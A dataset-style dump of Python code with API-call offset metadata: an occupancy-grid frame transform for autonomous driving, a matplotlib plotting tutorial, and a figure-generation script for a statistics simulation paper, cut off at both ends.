matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((2198, 2225), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['indices'], {}), '(indices)\n', (2216, 2225), False, 'from matrixprofile import core\n'), ((2430, 2440), 'matrixprofile.io.protobuf.proto_messages_pb2.Location', 'Location', ([], {}), '()\n', (2438, 2440), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((2534, 2562), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['neighbor'], {}), '(neighbor)\n', (2552, 2562), False, 'from matrixprofile import core\n'), ((4482, 4506), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (4500, 4506), False, 'from matrixprofile import core\n'), ((7351, 7375), 'matrixprofile.core.is_pmp_obj', 'core.is_pmp_obj', (['profile'], {}), '(profile)\n', (7366, 7375), False, 'from matrixprofile import core\n'), ((825, 851), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['matrix'], {}), '(matrix)\n', (843, 851), False, 'from matrixprofile import core\n'), ((6353, 6377), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (6371, 6377), False, 'from matrixprofile import core\n'), ((6616, 6640), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (6634, 6640), False, 'from matrixprofile import core\n'), ((6879, 6903), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (6897, 6903), False, 'from matrixprofile import core\n'), ((7142, 7166), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (7160, 7166), False, 'from matrixprofile import core\n'), ((11868, 11889), 'numpy.array', 'np.array', (['obj.windows'], {}), '(obj.windows)\n', (11876, 11889), True, 'import numpy as np\n')]
|
# Code to transform the driver sensor OGMs to the ego vehicle's OGM frame of reference.
import matplotlib.pyplot as plt
import numpy as np
import math
import copy
from utils.grid_utils import global_grid
import time
from scipy.spatial import cKDTree
import pdb
def mask_in_EgoGrid(global_grid_x, global_grid_y, ref_xy, ego_xy, pred_egoGrid, pred_maps, res, mask_unk=None, tolerance=1):
# Consider only the unknown cells in pred_egoGrid (ego sensor grid before trasfering values).
indices = np.where(mask_unk)
ego_x = ego_xy[0][indices]
ego_y = ego_xy[1][indices]
ego_xy = [ego_x, ego_y]
flat_indicies = indices[0]*pred_egoGrid.shape[1]+indices[1]
# ref indx --> global indx
ref_x_ind = np.floor(global_grid_x.shape[1]*(ref_xy[0]-x_min+res/2.)/(x_max-x_min+res)).astype(int) # column index
ref_y_ind = np.floor(global_grid_y.shape[0]*(ref_xy[1]-y_min+res/2.)/(y_max-y_min+res)).astype(int) # row index
ref_global_ind = np.vstack((ref_y_ind.flatten(), ref_x_ind.flatten())).T
# ego indx --> global indx
ego_x_ind = np.floor(global_grid_x.shape[1]*(ego_xy[0]-x_min+res/2.)/(x_max-x_min+res)).astype(int) # column index
ego_y_ind = np.floor(global_grid_y.shape[0]*(ego_xy[1]-y_min+res/2.)/(y_max-y_min+res)).astype(int) # row index
ego_global_ind = np.vstack((ego_y_ind.flatten(), ego_x_ind.flatten())).T
# Look for the matching global_grid indices between the ref_grid and ego_grid.
kdtree = cKDTree(ref_global_ind)
dists, inds = kdtree.query(ego_global_ind)
pred_egoGrid_flat = pred_egoGrid.flatten()
pred_maps_flat = pred_maps.flatten()
# Back to the local grid indices. Tolerance should be an integer because kd tree is comparing indices.
ego_ind = flat_indicies[np.where(dists<=tolerance)]
ref_ind = inds[np.where(dists<=tolerance)]
# Assign the values for the corresponding cells.
pred_egoGrid_flat[ego_ind] = pred_maps_flat[ref_ind]
pred_egoGrid = pred_egoGrid_flat.reshape(pred_egoGrid.shape)
return pred_egoGrid
def Transfer_to_EgoGrid(ref_local_xy, pred_maps, ego_local_xy, ego_sensor_grid, endpoint, res=0.1, mask_unk=None):
global x_min, x_max, y_min, y_max
#####################################################################################################################################
## Goal : Transfer pred_maps (in driver sensor's grid) cell information to the unknown cells of ego car's sensor_grid
## Method : Use global grid as an intermediate (ref indx --> global indx --> ego indx).
## ref_local_xy (N, 2, w, h) & pred_maps (N, w, h)
## ego_xy (2, w', h') & & ego_sensor_grid (w', h')
## return pred_maps_egoGrid(N, w', h')
## * N : number of agents
#####################################################################################################################################
x_min = endpoint[0]
x_max = endpoint[2]
y_min = endpoint[1]
y_max = endpoint[3]
global_res = 1.0
global_grid_x, global_grid_y = global_grid(np.array([x_min,y_min]),np.array([x_max,y_max]),global_res)
if np.any(ref_local_xy[0] == None):
pred_maps_egoGrid.append(None)
else:
pred_egoGrid = copy.copy(ego_sensor_grid)
pred_egoGrid = np.ones(ego_sensor_grid.shape)*2
pred_egoGrid = mask_in_EgoGrid(global_grid_x, global_grid_y, ref_local_xy, ego_local_xy, pred_egoGrid, pred_maps, res, mask_unk)
return pred_egoGrid
|
[
"numpy.ones",
"scipy.spatial.cKDTree",
"numpy.where",
"numpy.floor",
"numpy.any",
"numpy.array",
"copy.copy"
] |
[((501, 519), 'numpy.where', 'np.where', (['mask_unk'], {}), '(mask_unk)\n', (509, 519), True, 'import numpy as np\n'), ((1460, 1483), 'scipy.spatial.cKDTree', 'cKDTree', (['ref_global_ind'], {}), '(ref_global_ind)\n', (1467, 1483), False, 'from scipy.spatial import cKDTree\n'), ((3095, 3126), 'numpy.any', 'np.any', (['(ref_local_xy[0] == None)'], {}), '(ref_local_xy[0] == None)\n', (3101, 3126), True, 'import numpy as np\n'), ((1757, 1785), 'numpy.where', 'np.where', (['(dists <= tolerance)'], {}), '(dists <= tolerance)\n', (1765, 1785), True, 'import numpy as np\n'), ((1804, 1832), 'numpy.where', 'np.where', (['(dists <= tolerance)'], {}), '(dists <= tolerance)\n', (1812, 1832), True, 'import numpy as np\n'), ((3027, 3051), 'numpy.array', 'np.array', (['[x_min, y_min]'], {}), '([x_min, y_min])\n', (3035, 3051), True, 'import numpy as np\n'), ((3051, 3075), 'numpy.array', 'np.array', (['[x_max, y_max]'], {}), '([x_max, y_max])\n', (3059, 3075), True, 'import numpy as np\n'), ((3201, 3227), 'copy.copy', 'copy.copy', (['ego_sensor_grid'], {}), '(ego_sensor_grid)\n', (3210, 3227), False, 'import copy\n'), ((722, 816), 'numpy.floor', 'np.floor', (['(global_grid_x.shape[1] * (ref_xy[0] - x_min + res / 2.0) / (x_max - x_min +\n res))'], {}), '(global_grid_x.shape[1] * (ref_xy[0] - x_min + res / 2.0) / (x_max -\n x_min + res))\n', (730, 816), True, 'import numpy as np\n'), ((841, 935), 'numpy.floor', 'np.floor', (['(global_grid_y.shape[0] * (ref_xy[1] - y_min + res / 2.0) / (y_max - y_min +\n res))'], {}), '(global_grid_y.shape[0] * (ref_xy[1] - y_min + res / 2.0) / (y_max -\n y_min + res))\n', (849, 935), True, 'import numpy as np\n'), ((1067, 1161), 'numpy.floor', 'np.floor', (['(global_grid_x.shape[1] * (ego_xy[0] - x_min + res / 2.0) / (x_max - x_min +\n res))'], {}), '(global_grid_x.shape[1] * (ego_xy[0] - x_min + res / 2.0) / (x_max -\n x_min + res))\n', (1075, 1161), True, 'import numpy as np\n'), ((1186, 1280), 'numpy.floor', 'np.floor', (['(global_grid_y.shape[0] * (ego_xy[1] - y_min + res / 2.0) / (y_max - y_min +\n res))'], {}), '(global_grid_y.shape[0] * (ego_xy[1] - y_min + res / 2.0) / (y_max -\n y_min + res))\n', (1194, 1280), True, 'import numpy as np\n'), ((3252, 3282), 'numpy.ones', 'np.ones', (['ego_sensor_grid.shape'], {}), '(ego_sensor_grid.shape)\n', (3259, 3282), True, 'import numpy as np\n')]
|
# chapter Matplotlib Plotting
'''
The plot() function is used to draw points (markers) in a diagram.
By default, the plot() function draws a line from point to point.
The function takes parameters for specifying points in the diagram.
Parameter 1 is an array containing the points on the x-axis.
Parameter 2 is an array containing the points on the y-axis.
If we need to plot a line from (1, 3) to (8, 10), we have to pass two arrays [1, 8] and [3, 10] to the plot function.
'''
# Draw a line in a diagram from position (1, 3) to position (8, 10):
import matplotlib.pyplot as plt
import numpy as r
import sys
x=r.array([1,9,])
y=r.array([4,10])
plt.plot(x,y)
plt.show()
'''
Plotting Without Line
To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'.
'''
x=r.array([3,10])
y=r.array([0,34])
plt.plot(x,y,'o')
plt.show()
'''
Multiple Points
You can plot as many points as you like, just make sure you have the same number of points in both axis.
Example
Draw a line in a diagram from position (1, 3) to (2, 8) then to (6, 1) and finally to position (8, 10):f
'''
x=r.array([1,2,4,9])
y=r.array([3,6,8,10])
plt.plot(x,y,label="red")
plt.show()
#Two lines to make our compiler able to draw:
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
'''
Default X-Points
If we do not specify the points in the x-axis, they will get the default values 0, 1, 2, 3, (etc. depending on the length of the y-points.
So, if we take the same example as above, and leave out the x-points, the diagram will look like this:
'''
# Plotting without x-points:
ypoints=r.array([0,2,3,5,6,7,99])
plt.plot(ypoints)
plt.show()
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
# CHAPTER Matplotlib Markers
'''
Markers
You can use the keyword argument marker to emphasize each point with a specified marker:
'''
x=r.array([0,3,5,6,8,9])
y=r.array([2,4,6,7,8,10])
plt.plot(x,y,marker="*")
plt.show()
'''
Marker Reference
You can choose any of these markers:
Marker Description
'o' Circle
'*' Star
'.' Point
',' Pixel
'x' X
'X' X (filled)
'+' Plus
'P' Plus (filled)
's' Square
'D' Diamond
'd' Diamond (thin)
'p' Pentagon
'H' Hexagon
'h' Hexagon
'v' Triangle Down
'^' Triangle Up
'<' Triangle Left
'>' Triangle Right
'1' Tri Down
'2' Tri Up
'3' Tri Left
'4' Tri Right
'|' Vline
'_' Hline
'''
'''
Format Strings fmt
You can use also use the shortcut string notation parameter to specify the marker.
This parameter is also called fmt, and is written with this syntax:
marker|line|color
Example
Mark each point with a circle:
'''
x=r.array([3,5,5,6,7,8])
y=r.array([1,3,5,6,7,8])
plt.plot(x,y,'-.r')
plt.show()
'''
The marker value can be anything from the Marker Reference above.
The line value can be one of the following:
Line Reference
Line Syntax Description
'-' Solid line
':' Dotted line
'--' Dashed line
'-.' Dashed/dotted line
Note: If you leave out the line value in the fmt parameter, no line will be plottet.
'''
'''
Color Reference
Color Syntax Description
'r' Red
'g' Green
'b' Blue
'c' Cyan
'm' Magenta
'y' Yellow
'k' Black
'w' White
'''
'''
Marker Size
You can use the keyword argument markersize or the shorter version, ms to set the size of the markers:
'''
x=r.array([1,3,4,5,9,5])
y=r.array([0,3,6,8,8])
plt.plot(x,marker='o',ms='17')
plt.show()
'''
Marker Color
You can use the keyword argument markeredgecolor or the shorter mec to set the color of the edge of the markers:
Example
Set the EDGE color to red:
'''
x=r.array([2,3,5,6])
y=r.array('[0,3,5,6,8]')
plt.plot(x,marker='*',ms=34,mec='r')
plt.show()
'''
You can use the keyword argument markerfacecolor or the shorter mfc to set the color inside the edge of the markers:
Example
Set the FACE color to red:
'''
x=r.array([1,3,5,6])
y=r.array([2,3,5,6])
plt.plot(x,marker='*',ms=34,mfc='r')
plt.show()
'''
# Use both the mec and mfc arguments to color of the entire marker:
# Example
# Set the color of both the edge and the face to red:
'''
import matplotlib.pyplot as plt
import numpy as r
y=r.array([0,4,6,7,7,8])
plt.plot(y,marker='*',ms=30,mec='r',mfc='r')
plt.show()
'''
You can also use Hexadecimal color values:
Example
Mark each point with a beautiful green color:
...
plt.plot(ypoints, marker = 'o', ms = 20, mec = '#4CAF50', mfc = '#4CAF50')
...
'''
import matplotlib.pyplot as plt
import numpy as np
x=np.array([1,2,3,4,5,6,5,7])
y=np.array([1,2,4,5,5,6,])
plt.plot(y,ms=34,marker='*',mec='hotpink',mfc="hotpink",linestyle=':')
plt.show()
|
[
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.plot",
"numpy.array",
"sys.stdout.flush",
"matplotlib.pyplot.show"
] |
[((646, 661), 'numpy.array', 'r.array', (['[1, 9]'], {}), '([1, 9])\n', (653, 661), True, 'import numpy as r\n'), ((665, 681), 'numpy.array', 'r.array', (['[4, 10]'], {}), '([4, 10])\n', (672, 681), True, 'import numpy as r\n'), ((684, 698), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {}), '(x, y)\n', (692, 698), True, 'import matplotlib.pyplot as plt\n'), ((699, 709), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (707, 709), True, 'import matplotlib.pyplot as plt\n'), ((852, 868), 'numpy.array', 'r.array', (['[3, 10]'], {}), '([3, 10])\n', (859, 868), True, 'import numpy as r\n'), ((873, 889), 'numpy.array', 'r.array', (['[0, 34]'], {}), '([0, 34])\n', (880, 889), True, 'import numpy as r\n'), ((892, 911), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""o"""'], {}), "(x, y, 'o')\n", (900, 911), True, 'import matplotlib.pyplot as plt\n'), ((911, 921), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (919, 921), True, 'import matplotlib.pyplot as plt\n'), ((1181, 1202), 'numpy.array', 'r.array', (['[1, 2, 4, 9]'], {}), '([1, 2, 4, 9])\n', (1188, 1202), True, 'import numpy as r\n'), ((1203, 1225), 'numpy.array', 'r.array', (['[3, 6, 8, 10]'], {}), '([3, 6, 8, 10])\n', (1210, 1225), True, 'import numpy as r\n'), ((1226, 1253), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'label': '"""red"""'}), "(x, y, label='red')\n", (1234, 1253), True, 'import matplotlib.pyplot as plt\n'), ((1253, 1263), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1261, 1263), True, 'import matplotlib.pyplot as plt\n'), ((1319, 1349), 'matplotlib.pyplot.savefig', 'plt.savefig', (['sys.stdout.buffer'], {}), '(sys.stdout.buffer)\n', (1330, 1349), True, 'import matplotlib.pyplot as plt\n'), ((1351, 1369), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1367, 1369), False, 'import sys\n'), ((1689, 1720), 'numpy.array', 'r.array', (['[0, 2, 3, 5, 6, 7, 99]'], {}), '([0, 2, 3, 5, 6, 7, 99])\n', (1696, 1720), True, 'import numpy as r\n'), ((1718, 1735), 'matplotlib.pyplot.plot', 'plt.plot', (['ypoints'], {}), '(ypoints)\n', (1726, 1735), True, 'import matplotlib.pyplot as plt\n'), ((1737, 1747), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1745, 1747), True, 'import matplotlib.pyplot as plt\n'), ((1751, 1781), 'matplotlib.pyplot.savefig', 'plt.savefig', (['sys.stdout.buffer'], {}), '(sys.stdout.buffer)\n', (1762, 1781), True, 'import matplotlib.pyplot as plt\n'), ((1783, 1801), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1799, 1801), False, 'import sys\n'), ((1950, 1977), 'numpy.array', 'r.array', (['[0, 3, 5, 6, 8, 9]'], {}), '([0, 3, 5, 6, 8, 9])\n', (1957, 1977), True, 'import numpy as r\n'), ((1978, 2006), 'numpy.array', 'r.array', (['[2, 4, 6, 7, 8, 10]'], {}), '([2, 4, 6, 7, 8, 10])\n', (1985, 2006), True, 'import numpy as r\n'), ((2005, 2031), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'marker': '"""*"""'}), "(x, y, marker='*')\n", (2013, 2031), True, 'import matplotlib.pyplot as plt\n'), ((2033, 2043), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2041, 2043), True, 'import matplotlib.pyplot as plt\n'), ((2794, 2821), 'numpy.array', 'r.array', (['[3, 5, 5, 6, 7, 8]'], {}), '([3, 5, 5, 6, 7, 8])\n', (2801, 2821), True, 'import numpy as r\n'), ((2820, 2847), 'numpy.array', 'r.array', (['[1, 3, 5, 6, 7, 8]'], {}), '([1, 3, 5, 6, 7, 8])\n', (2827, 2847), True, 'import numpy as r\n'), ((2846, 2867), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""-.r"""'], {}), "(x, y, '-.r')\n", (2854, 2867), True, 'import matplotlib.pyplot as plt\n'), ((2867, 2877), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2875, 2877), True, 'import matplotlib.pyplot as plt\n'), ((3525, 3552), 'numpy.array', 'r.array', (['[1, 3, 4, 5, 9, 5]'], {}), '([1, 3, 4, 5, 9, 5])\n', (3532, 3552), True, 'import numpy as r\n'), ((3551, 3575), 'numpy.array', 'r.array', (['[0, 3, 6, 8, 8]'], {}), '([0, 3, 6, 8, 8])\n', (3558, 3575), True, 'import numpy as r\n'), ((3575, 3607), 'matplotlib.pyplot.plot', 'plt.plot', (['x'], {'marker': '"""o"""', 'ms': '"""17"""'}), "(x, marker='o', ms='17')\n", (3583, 3607), True, 'import matplotlib.pyplot as plt\n'), ((3607, 3617), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3615, 3617), True, 'import matplotlib.pyplot as plt\n'), ((3802, 3823), 'numpy.array', 'r.array', (['[2, 3, 5, 6]'], {}), '([2, 3, 5, 6])\n', (3809, 3823), True, 'import numpy as r\n'), ((3824, 3846), 'numpy.array', 'r.array', (['"""[0,3,5,6,8]"""'], {}), "('[0,3,5,6,8]')\n", (3831, 3846), True, 'import numpy as r\n'), ((3850, 3889), 'matplotlib.pyplot.plot', 'plt.plot', (['x'], {'marker': '"""*"""', 'ms': '(34)', 'mec': '"""r"""'}), "(x, marker='*', ms=34, mec='r')\n", (3858, 3889), True, 'import matplotlib.pyplot as plt\n'), ((3888, 3898), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3896, 3898), True, 'import matplotlib.pyplot as plt\n'), ((4073, 4094), 'numpy.array', 'r.array', (['[1, 3, 5, 6]'], {}), '([1, 3, 5, 6])\n', (4080, 4094), True, 'import numpy as r\n'), ((4095, 4116), 'numpy.array', 'r.array', (['[2, 3, 5, 6]'], {}), '([2, 3, 5, 6])\n', (4102, 4116), True, 'import numpy as r\n'), ((4117, 4156), 'matplotlib.pyplot.plot', 'plt.plot', (['x'], {'marker': '"""*"""', 'ms': '(34)', 'mfc': '"""r"""'}), "(x, marker='*', ms=34, mfc='r')\n", (4125, 4156), True, 'import matplotlib.pyplot as plt\n'), ((4155, 4165), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4163, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4370, 4397), 'numpy.array', 'r.array', (['[0, 4, 6, 7, 7, 8]'], {}), '([0, 4, 6, 7, 7, 8])\n', (4377, 4397), True, 'import numpy as r\n'), ((4396, 4444), 'matplotlib.pyplot.plot', 'plt.plot', (['y'], {'marker': '"""*"""', 'ms': '(30)', 'mec': '"""r"""', 'mfc': '"""r"""'}), "(y, marker='*', ms=30, mec='r', mfc='r')\n", (4404, 4444), True, 'import matplotlib.pyplot as plt\n'), ((4442, 4452), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4450, 4452), True, 'import matplotlib.pyplot as plt\n'), ((4715, 4749), 'numpy.array', 'np.array', (['[1, 2, 3, 4, 5, 6, 5, 7]'], {}), '([1, 2, 3, 4, 5, 6, 5, 7])\n', (4723, 4749), True, 'import numpy as np\n'), ((4746, 4774), 'numpy.array', 'np.array', (['[1, 2, 4, 5, 5, 6]'], {}), '([1, 2, 4, 5, 5, 6])\n', (4754, 4774), True, 'import numpy as np\n'), ((4774, 4849), 'matplotlib.pyplot.plot', 'plt.plot', (['y'], {'ms': '(34)', 'marker': '"""*"""', 'mec': '"""hotpink"""', 'mfc': '"""hotpink"""', 'linestyle': '""":"""'}), "(y, ms=34, marker='*', mec='hotpink', mfc='hotpink', linestyle=':')\n", (4782, 4849), True, 'import matplotlib.pyplot as plt\n'), ((4848, 4858), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4856, 4858), True, 'import matplotlib.pyplot as plt\n')]
|
# -*- coding: utf-8 -*-
"""
Make figures for MUSim paper
AUTHOR: <NAME>
VERSION DATE: 26 June 2019
"""
import os
from os.path import join
import numpy as np
import pandas as pd
from statsmodels.stats.proportion import proportion_confint
import matplotlib.pyplot as plt
def binom_ci_precision(proportion, nobs, method='beta', alpha=0.05):
"""
Get precision for binomial proportion confidence interval
"""
count = proportion * nobs
ci = proportion_confint(count, nobs, method=method, alpha=alpha)
ci_precision = ci[1] - proportion
return ci_precision
def make_power_bar(data, colors, error_bars='se', mean_amp=True, legend=False):
use_colors = colors.copy()
use_cols = ['Fmax', 'cluster_05', 'cluster_01', 'BH', 'BY', 'BKY']
if mean_amp:
use_cols.insert(0, 'mean_amp')
#Get values for error bars
power_data = data.loc[:, use_cols].to_numpy().T
if error_bars.lower() == 'se':
stderr = np.sqrt( (power_data*(1-power_data)) / 10000 )
elif error_bars.lower() == 'ci':
stderr = binom_ci_precision(power_data, 10000)
elif error_bars is None:
stderr = None
else:
raise ValueError('Incorrect input for error_bars')
#Plot
labels = ['Fmax', 'cluster (p≤0.05 threshold)', 'cluster (p≤0.05 threshold)',
'FDR (Benjamini & Hochberg, 1995)', 'FDR (Benjamini & Yekutieli, 2001)',
'FDR (Benjamini et al., 2006)']
if mean_amp:
labels.insert(0, 'mean amplitude')
use_colors.insert(0, 'black')
data.plot.bar(x='time_window', y=use_cols, label=labels, color=use_colors,
fontsize=16, yerr=stderr, legend=legend)
plt.xticks(rotation='horizontal')
plt.xlabel('')
plt.ylim((0,1))
if legend:
plt.legend(loc=(1.04,0), prop={'size': 12})
def make_power_figures(colors, results_dir):
#Get all results csv files
results_files = [file for file in os.listdir(results_dir) if file.endswith('.csv')]
for results_file in results_files:
#Load data
data = pd.read_csv(join(results_dir, results_file))
if 'Power' in results_file and 'Familywise' in results_file:
if 'FamilywisePower' in results_file:
mean_amp = True
else:
mean_amp = False
#Make file with legend
if not os.path.isfile(join(results_dir, 'legend.tif')):
make_power_bar(data[0:3], colors, legend=True)
img_file = join(results_dir, 'legend.tif')
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
#Make figures
make_power_bar(data[0:3], colors, error_bars='CI', mean_amp=mean_amp)
img_file = join(results_dir, '%s_N400.tif' % results_file.strip('.csv'))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
make_power_bar(data[3:6], colors, error_bars='CI', mean_amp=mean_amp)
img_file = join(results_dir, '%s_P300.tif' % results_file.strip('.csv'))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
make_power_bar(data[6:9], colors, error_bars='CI', mean_amp=mean_amp)
img_file = join(results_dir, '%s_P1.tif' % results_file.strip('.csv'))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
def make_null_figures(results_dir):
#Get data
data = pd.read_csv(join(results_dir, 'MUSim_Null_FamilywiseTypeI.csv'))
data[['n_trials', 'n_subjects']] = data[['n_trials', 'n_subjects']].astype(int)
#Plotting parameters
use_cols = ['mean_amp', 'Fmax', 'cluster_05', 'cluster_01']
labels = ['mean amplitude', 'Fmax', 'cluster (p ≤ 0.05 threshold)', 'cluster (p ≤ 0.01 threshold)']
use_colors = ['black', 'lightgreen', 'navy', 'cornflowerblue']
for time_wind in ('0 - 300', '300 - 1000'):
for trials in (40, 20, 10):
plot_subset = data[(data['time_window'] == time_wind) & (data['n_trials'] == trials)]
proportions = plot_subset.loc[:, use_cols].to_numpy().T
stderr = binom_ci_precision(proportions, 10000)
#Make bar graph
plot_subset.plot.bar(x='n_subjects', y=use_cols, label=labels, color=use_colors,
fontsize=16, yerr=stderr, legend=False)
plt.xticks(rotation='horizontal')
plt.xlabel('')
plt.ylim((0,0.1))
plt.axhline(y=0.05,linewidth=1, color='r', linestyle='--')
plt.yticks(np.arange(1,11)/100)
plt.xlabel('Number of Subjects', fontsize=18)
#Save file
img_file = join(results_dir, 'MUSim_Null_FamilywiseTypeI_%s_%dtrials.tif' % (time_wind, trials))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
def make_EW_figures(colors, results_dir):
ew_files = [file for file in os.listdir(results_dir) if 'Power_EW' in file and file.endswith('.csv')]
for ew_file in ew_files:
#Get data
data = pd.read_csv(join(results_dir, ew_file))
#Rename colums to labels to be used in figure
data.columns = ['uncorrected', 'Sidak', 'Fmax', 'Clust0.05', 'Clust0.01', 'BH FDR', 'BY FDR', 'BKY FDR']
#Make box plot
bplot = data.loc[:, 'Fmax':].boxplot(whis=[5, 95], showfliers=False,
return_type='dict', patch_artist=True,
fontsize=12)
#For proporition measures, set standard y-scale
if 'onset' not in ew_file and 'offset' not in ew_file:
plt.ylim((0,1))
#Update colors and line sizes
for key in bplot.keys():
i = 0
for item in bplot[key]:
item.set_linewidth(4)
if key == 'medians':
item.set_color('black')
else:
item.set_color(colors[int(i)])
if key in ['whiskers', 'caps']:
i += 0.5
else:
i += 1
#Save figure
img_file = join(results_dir, ew_file.strip('.csv') + '.tif')
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
def main():
results_dir = r'C:\Users\ecfne\Documents\Eric\Research\Stats Simulations\MUSim\results'
colors = ['lightgreen', 'navy', 'cornflowerblue', 'red', 'lightcoral', 'firebrick']
make_power_figures(colors, results_dir)
make_null_figures(results_dir)
make_EW_figures(colors, results_dir)
if __name__ == '__main__':
main()
|
[
"os.listdir",
"numpy.sqrt",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.xticks",
"statsmodels.stats.proportion.proportion_confint",
"numpy.arange",
"matplotlib.pyplot.xlabel",
"os.path.join",
"matplotlib.pyplot.close",
"matplotlib.pyplot.axhline",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.legend"
] |
[((480, 539), 'statsmodels.stats.proportion.proportion_confint', 'proportion_confint', (['count', 'nobs'], {'method': 'method', 'alpha': 'alpha'}), '(count, nobs, method=method, alpha=alpha)\n', (498, 539), False, 'from statsmodels.stats.proportion import proportion_confint\n'), ((1754, 1787), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""horizontal"""'}), "(rotation='horizontal')\n", (1764, 1787), True, 'import matplotlib.pyplot as plt\n'), ((1793, 1807), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (1803, 1807), True, 'import matplotlib.pyplot as plt\n'), ((1813, 1829), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0, 1)'], {}), '((0, 1))\n', (1821, 1829), True, 'import matplotlib.pyplot as plt\n'), ((1006, 1052), 'numpy.sqrt', 'np.sqrt', (['(power_data * (1 - power_data) / 10000)'], {}), '(power_data * (1 - power_data) / 10000)\n', (1013, 1052), True, 'import numpy as np\n'), ((1854, 1898), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(1.04, 0)', 'prop': "{'size': 12}"}), "(loc=(1.04, 0), prop={'size': 12})\n", (1864, 1898), True, 'import matplotlib.pyplot as plt\n'), ((3725, 3776), 'os.path.join', 'join', (['results_dir', '"""MUSim_Null_FamilywiseTypeI.csv"""'], {}), "(results_dir, 'MUSim_Null_FamilywiseTypeI.csv')\n", (3729, 3776), False, 'from os.path import join\n'), ((6628, 6679), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (6639, 6679), True, 'import matplotlib.pyplot as plt\n'), ((6689, 6700), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6698, 6700), True, 'import matplotlib.pyplot as plt\n'), ((2029, 2052), 'os.listdir', 'os.listdir', (['results_dir'], {}), '(results_dir)\n', (2039, 2052), False, 'import os\n'), ((2183, 2214), 'os.path.join', 'join', (['results_dir', 'results_file'], {}), '(results_dir, results_file)\n', (2187, 2214), False, 'from os.path import join\n'), ((3011, 3062), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (3022, 3062), True, 'import matplotlib.pyplot as plt\n'), ((3076, 3087), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3085, 3087), True, 'import matplotlib.pyplot as plt\n'), ((3285, 3336), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (3296, 3336), True, 'import matplotlib.pyplot as plt\n'), ((3350, 3361), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3359, 3361), True, 'import matplotlib.pyplot as plt\n'), ((3556, 3607), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (3567, 3607), True, 'import matplotlib.pyplot as plt\n'), ((3621, 3632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3630, 3632), True, 'import matplotlib.pyplot as plt\n'), ((4671, 4704), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""horizontal"""'}), "(rotation='horizontal')\n", (4681, 4704), True, 'import matplotlib.pyplot as plt\n'), ((4718, 4732), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (4728, 4732), True, 'import matplotlib.pyplot as plt\n'), ((4746, 4764), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0, 0.1)'], {}), '((0, 0.1))\n', (4754, 4764), True, 'import matplotlib.pyplot as plt\n'), ((4777, 4836), 'matplotlib.pyplot.axhline', 'plt.axhline', ([], {'y': '(0.05)', 'linewidth': '(1)', 'color': '"""r"""', 'linestyle': '"""--"""'}), "(y=0.05, linewidth=1, color='r', linestyle='--')\n", (4788, 4836), True, 'import 